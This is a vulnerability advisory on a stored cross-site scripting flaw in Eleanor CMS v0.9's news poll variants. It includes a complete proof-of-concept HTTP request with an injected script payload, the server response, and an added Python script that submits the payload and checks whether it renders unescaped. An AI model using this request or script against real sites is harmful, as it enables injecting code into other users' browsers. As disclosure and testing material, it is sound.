=============================================
ICG Laboratory
- Discovered By : 0x3a
- Date : August 21, 2017
- HomePage : Www.Iran-Cyber.net
- Vendor HomePage : Www.eleanor-cms.ru
=============================================
I. VULNERABILITY
-------------------------
Eleanor CMS v0.9 - Stored Cross Site Scripting
II. BACKGROUND
-------------------------
Vendor description: consumes significantly fewer resources than DLE, WordPress or Joomla.
A CMS with support for Russian text.
Well thought-out multilanguage support lets you build a site in several languages.
A flexible template system gives free rein to design ideas.
Fully commented source code makes it much easier to get to know the system.
III. DESCRIPTION
-------------------------
A Stored Cross Site Scripting vulnerability has been found in Eleanor CMS that
allows arbitrary HTML/script code to be executed in the context of the
victim user's browser. The injected code is saved on the server with the poll
and runs for every user who views it.
IV. PROOF OF CONCEPT
-------------------------
Create a user and log in with it. In News click Add News, and in the Voting
section add a voting (poll). The attacker can put any HTML/script into one of
the poll variants and it is stored unmodified.
The request below does this:
Request:

POST Eleanor/news/add HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0 Cyberfox/52.2.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/Eleanor/news/add
Cookie: eluser=MTkwZmJjODQ4YmQwZjZmYmJjMWY3YTIwMWYyM2FhZWZ8Mg%3D%3D; el1-6=1; el1-4=1; elUploader-=599db3805df29
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 452

title=Pentest&uri=&tags=&announcement=Pentest&text=Pentest&show_detail=1&enddate=&status=1&voting%5B_addvoting%5D=1&voting%5Bbegin%5D=&voting%5Bend%5D=&voting%5Bagaindays%5D=10&voting%5B_questions%5D%5B0%5D%5Btitle%5D=Pentest&voting%5B_questions%5D%5B0%5D%5Bvariants%5D%5B0%5D=1&voting%5B_questions%5D%5B0%5D%5Bvariants%5D%5B1%5D=<script>alert("Stored XSS By 0x3a | ICG Labrotary")&voting%5B_questions%5D%5B0%5D%5Bmaxans%5D=2&back=http%3A%2F%2F127.0.0.1%2Fnews%2Fdelete%2F9&_draft=0

Response:

HTTP/1.1 200 OK
Date: Wed, 23 Aug 2017 17:09:03 GMT
Server: Apache/2.4.17 (Win32) OpenSSL/1.0.2d PHP/5.6.15
X-Powered-By: PHP/5.6.15
Cache-Control: no-store
Content-Language: en
Content-Encoding: gzip
X-Powered-CMS: Eleanor CMS http://eleanor-cms.ru
Content-Length: 3544
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=windows-1251
The parameter voting[_questions][0][variants][1] (sent as
voting%5B_questions%5D%5B0%5D%5Bvariants%5D%5B1%5D) is not filtered or
encoded on output, which is what makes the stored XSS possible: the
<script> payload is saved as the text of the second poll variant and is
rendered as-is wherever that poll is displayed.
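The following script is an added example written for this page; it is not part of the advisory and not Eleanor CMS code. It rebuilds the form body from the request above with a marker payload in the same unfiltered variant field, and classifies a returned page as rendering the variant unescaped (stored XSS confirmed), HTML-entity encoded (what a fix should produce), or not at all. The base URL, the session cookie value, the /news listing path and the sample HTML responses are assumptions; the live submit_and_check() function is included for use against a test install and is not exercised offline.

```python
# Added example (not part of the advisory or of Eleanor CMS): rebuilds the
# advisory's POST body and checks a page for the poll variant being rendered
# unescaped.
import html
import urllib.request
from urllib.parse import parse_qs, urlencode

# Marker payload for the unfiltered field; the advisory's own request uses an
# unterminated <script> tag in the same parameter.
PAYLOAD = '<script>alert("Stored XSS check")</script>'

# Form field name as it appears (URL-decoded) in the advisory's request body.
VARIANT_PARAM = "voting[_questions][0][variants][1]"


def build_news_body(payload: str = PAYLOAD) -> str:
    """Form-encode the fields from the advisory's POST, carrying the payload
    in the second poll variant."""
    fields = [
        ("title", "Pentest"), ("uri", ""), ("tags", ""),
        ("announcement", "Pentest"), ("text", "Pentest"),
        ("show_detail", "1"), ("enddate", ""), ("status", "1"),
        ("voting[_addvoting]", "1"), ("voting[begin]", ""),
        ("voting[end]", ""), ("voting[againdays]", "10"),
        ("voting[_questions][0][title]", "Pentest"),
        ("voting[_questions][0][variants][0]", "1"),
        (VARIANT_PARAM, payload),
        ("voting[_questions][0][maxans]", "2"),
        ("_draft", "0"),
    ]
    return urlencode(fields)


def decode_variant(body: str) -> str:
    """Recover the variant value from an encoded body (sanity check that the
    payload survives form encoding unchanged)."""
    return parse_qs(body, keep_blank_values=True)[VARIANT_PARAM][0]


def classify_reflection(page_html: str, payload: str = PAYLOAD) -> str:
    """'unescaped' if the raw payload is in the page (stored XSS confirmed),
    'escaped' if only an HTML-entity-encoded copy is present (fixed output),
    'absent' if the variant is not rendered on this page at all."""
    if payload in page_html:
        return "unescaped"
    if (html.escape(payload, quote=True) in page_html
            or html.escape(payload, quote=False) in page_html):
        return "escaped"
    return "absent"


def submit_and_check(base_url: str, session_cookie: str,
                     payload: str = PAYLOAD) -> str:
    """Live check against a test install (not run offline): post the poll as
    an authenticated user, fetch the news listing and classify the output.
    base_url, the cookie string and the /news listing path are assumptions."""
    body = build_news_body(payload).encode()
    req = urllib.request.Request(
        base_url + "/news/add", data=body, method="POST",
        headers={"Cookie": session_cookie,
                 "Content-Type": "application/x-www-form-urlencoded"})
    urllib.request.urlopen(req).read()
    listing = urllib.request.Request(base_url + "/news",
                                     headers={"Cookie": session_cookie})
    # The advisory's response is served as windows-1251.
    page = urllib.request.urlopen(listing).read().decode(
        "windows-1251", errors="replace")
    return classify_reflection(page, payload)


# Constructed sample responses (not real CMS output) for the offline check.
VULNERABLE_SAMPLE = (
    '<form><label><input type="radio" name="a"> 1</label>'
    f'<label><input type="radio" name="a"> {PAYLOAD}</label></form>')
FIXED_SAMPLE = VULNERABLE_SAMPLE.replace(
    PAYLOAD, html.escape(PAYLOAD, quote=True))

if __name__ == "__main__":
    print("payload survives encoding:",
          decode_variant(build_news_body()) == PAYLOAD)
    print("vulnerable sample:", classify_reflection(VULNERABLE_SAMPLE))
    print("fixed sample:", classify_reflection(FIXED_SAMPLE))
```

The "escaped" case is what the poll output should look like once the CMS encodes the variant text before rendering; "unescaped" reproduces the advisory's finding, and "absent" usually means the poll is not on the page fetched rather than that the bug is fixed.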
V. BUSINESS IMPACT
-------------------------
An attacker can execute arbitrary HTML or script code in a targeted user's
browser. Because the payload is stored with the poll, it runs for every user
who views it, including administrators, and can be leveraged to steal
sensitive information such as user credentials, session cookies and personal data.
VI. SYSTEMS AFFECTED
-------------------------
Eleanor CMS v0.9
VII. SOLUTION
-------------------------
No Patch Released
VIII. CREDITS
-------------------------
This vulnerability has been discovered and reported
by ICG Laboratory
IX. About Me
-------------------------
0x3a | tlg : @CloudLinux